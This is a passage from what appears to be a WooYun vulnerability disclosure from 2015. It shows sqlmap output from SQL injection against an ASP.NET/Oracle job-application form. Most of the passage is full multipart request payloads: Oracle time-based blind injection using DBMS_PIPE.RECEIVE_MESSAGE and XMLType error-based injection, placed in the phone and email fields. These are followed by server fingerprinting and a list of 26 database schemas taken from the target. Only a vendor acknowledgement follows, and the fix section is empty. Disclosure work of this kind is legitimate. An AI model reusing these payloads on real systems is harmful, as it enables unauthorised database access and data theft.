/wEPDwUKMTYxNDAzMTAwMw9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YRYEAgMPEBYGHg1EYXRhVGV4dEZpZWxkBQxyZWNydWl0X25hbWUeDkRhdGFWYWx1ZUZpZWxkBQxyZWNydWl0X25hbWUeC18hRGF0YUJvdW5kZxAVBxJORVTkuK3nuqflt6XnqIvluIgY5Zu96ZmF5py656Wo6ZSA5ZSu5Luj6KGoD1RNQ+mUgOWUrue7j+eQhgnlh7rnpajlkZgTSkFWQeS4ree6p+W3peeoi+W4iBjmnLrnpajlm6LpmJ/plIDllK7kuJPlkZgY5py656Wo6L+Q5Lu35b2V5YWl5LiT5ZGYFQcSTkVU5Lit57qn5bel56iL5biIGOWbvemZheacuuelqOmUgOWUruS7o+ihqA9UTUPplIDllK7nu4/nkIYJ5Ye656Wo5ZGYE0pBVkHkuK3nuqflt6XnqIvluIgY5py656Wo5Zui6Zif6ZSA5ZSu5LiT5ZGYGOacuuelqOi/kOS7t+W9leWFpeS4k+WRmBQrAwdnZ2dnZ2dnZGQCDQ8PZBYCHghvbmNoYW5nZQXOAWlmKC9eLitcLihodG1sfHhsc3xkb2N8dHh0fGpwZ3wpJC9pLnRlc3QodGhpcy52YWx1ZS50b0xvd2VyQ2FzZSgpKSl7cmV0dXJuIHRydWU7fWVsc2Uge2FsZXJ0KCflr7nkuI3otbfvvIwg5LiK5Lyg55qE5qC85byP5LiN5Yy56YWN77yM6K+35LiK5LygaHRtbHxkb2N8dHh0fHhsc3xqcGfmoLzlvI/vvIEnKTt0aGlzLm91dGVySFRNTD10aGlzLm91dGVySFRNTDt9ZGQ09zXKk0A9Swb5f8dUoCYcFGGubA==
-----------------------------643024530396
Content-Disposition: form-data; name="names"
abc
-----------------------------643024530396
Content-Disposition: form-data; name="employment"
NET?D??1��3����|
-----------------------------643024530396
Content-Disposition: form-data; name="phone"
13122223333'||(SELECT 'Qppd' FROM DUAL WHERE 6183=6183 AND 6041=DBMS_PIPE.RECEIVE_MESSAGE(CHR(71)||CHR(81)||CHR(82)||CHR(65),5))||'
-----------------------------643024530396
Content-Disposition: form-data; name="phone1"
13112344321
-----------------------------643024530396
Content-Disposition: form-data; name="email"
1@q.com
-----------------------------643024530396
Content-Disposition: form-data; name="type"
0
-----------------------------643024530396
Content-Disposition: form-data; name="details"
asd
-----------------------------643024530396
Content-Disposition: form-data; name="uploadfile"; filename=""
Content-Type: application/octet-stream
-----------------------------643024530396
Content-Disposition: form-data; name="btnOk"
����???����Y
-----------------------------643024530396
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWCALkt+CtAgLeqs/kCwKqueeGAgKwgbuWDQKwgf+XDQKyzcaDDQLyv478DQL9kpmPAbomX9L3RIM5mcEynDzi1W4f8DaL
-----------------------------643024530396--
Parameter: MULTIPART email ((custom) POST)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: -----------------------------643024530396
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwUKMTYxNDAzMTAwMw9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YRYEAgMPEBYGHg1EYXRhVGV4dEZpZWxkBQxyZWNydWl0X25hbWUeDkRhdGFWYWx1ZUZpZWxkBQxyZWNydWl0X25hbWUeC18hRGF0YUJvdW5kZxAVBxJORVTkuK3nuqflt6XnqIvluIgY5Zu96ZmF5py656Wo6ZSA5ZSu5Luj6KGoD1RNQ+mUgOWUrue7j+eQhgnlh7rnpajlkZgTSkFWQeS4ree6p+W3peeoi+W4iBjmnLrnpajlm6LpmJ/plIDllK7kuJPlkZgY5py656Wo6L+Q5Lu35b2V5YWl5LiT5ZGYFQcSTkVU5Lit57qn5bel56iL5biIGOWbvemZheacuuelqOmUgOWUruS7o+ihqA9UTUPplIDllK7nu4/nkIYJ5Ye656Wo5ZGYE0pBVkHkuK3nuqflt6XnqIvluIgY5py656Wo5Zui6Zif6ZSA5ZSu5LiT5ZGYGOacuuelqOi/kOS7t+W9leWFpeS4k+WRmBQrAwdnZ2dnZ2dnZGQCDQ8PZBYCHghvbmNoYW5nZQXOAWlmKC9eLitcLihodG1sfHhsc3xkb2N8dHh0fGpwZ3wpJC9pLnRlc3QodGhpcy52YWx1ZS50b0xvd2VyQ2FzZSgpKSl7cmV0dXJuIHRydWU7fWVsc2Uge2FsZXJ0KCflr7nkuI3otbfvvIwg5LiK5Lyg55qE5qC85byP5LiN5Yy56YWN77yM6K+35LiK5LygaHRtbHxkb2N8dHh0fHhsc3xqcGfmoLzlvI/vvIEnKTt0aGlzLm91dGVySFRNTD10aGlzLm91dGVySFRNTDt9ZGQ09zXKk0A9Swb5f8dUoCYcFGGubA==
-----------------------------643024530396
Content-Disposition: form-data; name="names"
abc
-----------------------------643024530396
Content-Disposition: form-data; name="employment"
NET?D??1��3����|
-----------------------------643024530396
Content-Disposition: form-data; name="phone"
13122223333
-----------------------------643024530396
Content-Disposition: form-data; name="phone1"
13112344321
-----------------------------643024530396
Content-Disposition: form-data; name="email"
1@q.com'||(SELECT 'UzxQ' FROM DUAL WHERE 2668=2668 AND 5905=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (5905=5905) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(122)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL))||'
-----------------------------643024530396
Content-Disposition: form-data; name="type"
0
-----------------------------643024530396
Content-Disposition: form-data; name="details"
asd
-----------------------------643024530396
Content-Disposition: form-data; name="uploadfile"; filename=""
Content-Type: application/octet-stream
-----------------------------643024530396
Content-Disposition: form-data; name="btnOk"
����???����Y
-----------------------------643024530396
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWCALkt+CtAgLeqs/kCwKqueeGAgKwgbuWDQKwgf+XDQKyzcaDDQLyv478DQL9kpmPAbomX9L3RIM5mcEynDzi1W4f8DaL
-----------------------------643024530396--
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: -----------------------------643024530396
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwUKMTYxNDAzMTAwMw9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YRYEAgMPEBYGHg1EYXRhVGV4dEZpZWxkBQxyZWNydWl0X25hbWUeDkRhdGFWYWx1ZUZpZWxkBQxyZWNydWl0X25hbWUeC18hRGF0YUJvdW5kZxAVBxJORVTkuK3nuqflt6XnqIvluIgY5Zu96ZmF5py656Wo6ZSA5ZSu5Luj6KGoD1RNQ+mUgOWUrue7j+eQhgnlh7rnpajlkZgTSkFWQeS4ree6p+W3peeoi+W4iBjmnLrnpajlm6LpmJ/plIDllK7kuJPlkZgY5py656Wo6L+Q5Lu35b2V5YWl5LiT5ZGYFQcSTkVU5Lit57qn5bel56iL5biIGOWbvemZheacuuelqOmUgOWUruS7o+ihqA9UTUPplIDllK7nu4/nkIYJ5Ye656Wo5ZGYE0pBVkHkuK3nuqflt6XnqIvluIgY5py656Wo5Zui6Zif6ZSA5ZSu5LiT5ZGYGOacuuelqOi/kOS7t+W9leWFpeS4k+WRmBQrAwdnZ2dnZ2dnZGQCDQ8PZBYCHghvbmNoYW5nZQXOAWlmKC9eLitcLihodG1sfHhsc3xkb2N8dHh0fGpwZ3wpJC9pLnRlc3QodGhpcy52YWx1ZS50b0xvd2VyQ2FzZSgpKSl7cmV0dXJuIHRydWU7fWVsc2Uge2FsZXJ0KCflr7nkuI3otbfvvIwg5LiK5Lyg55qE5qC85byP5LiN5Yy56YWN77yM6K+35LiK5LygaHRtbHxkb2N8dHh0fHhsc3xqcGfmoLzlvI/vvIEnKTt0aGlzLm91dGVySFRNTD10aGlzLm91dGVySFRNTDt9ZGQ09zXKk0A9Swb5f8dUoCYcFGGubA==
-----------------------------643024530396
Content-Disposition: form-data; name="names"
abc
-----------------------------643024530396
Content-Disposition: form-data; name="employment"
NET?D??1��3����|
-----------------------------643024530396
Content-Disposition: form-data; name="phone"
13122223333
-----------------------------643024530396
Content-Disposition: form-data; name="phone1"
13112344321
-----------------------------643024530396
Content-Disposition: form-data; name="email"
1@q.com'||(SELECT 'RVVS' FROM DUAL WHERE 8308=8308 AND 5543=DBMS_PIPE.RECEIVE_MESSAGE(CHR(113)||CHR(116)||CHR(83)||CHR(70),5))||'
-----------------------------643024530396
Content-Disposition: form-data; name="type"
0
-----------------------------643024530396
Content-Disposition: form-data; name="details"
asd
-----------------------------643024530396
Content-Disposition: form-data; name="uploadfile"; filename=""
Content-Type: application/octet-stream
-----------------------------643024530396
Content-Disposition: form-data; name="btnOk"
����???����Y
-----------------------------643024530396
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWCALkt+CtAgLeqs/kCwKqueeGAgKwgbuWDQKwgf+XDQKyzcaDDQLyv478DQL9kpmPAbomX9L3RIM5mcEynDzi1W4f8DaL
-----------------------------643024530396--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle
available databases [26]:
[*] ACCOUNT
[*] APEX_030200
[*] APPQOSSYS
[*] CPS
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] INSURE
[*] JCPTJK
[*] MDSYS
[*] MOBILE
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] PMPF
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TPYBX
[*] WMSYS
[*] XDB
[*] ZHAOPIN

修复方案:

~~~

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-06-05 14:22

厂商回复:

感谢厂商以及白帽子的协助发现,我们已经安排人员处理中。

最新状态:

暂无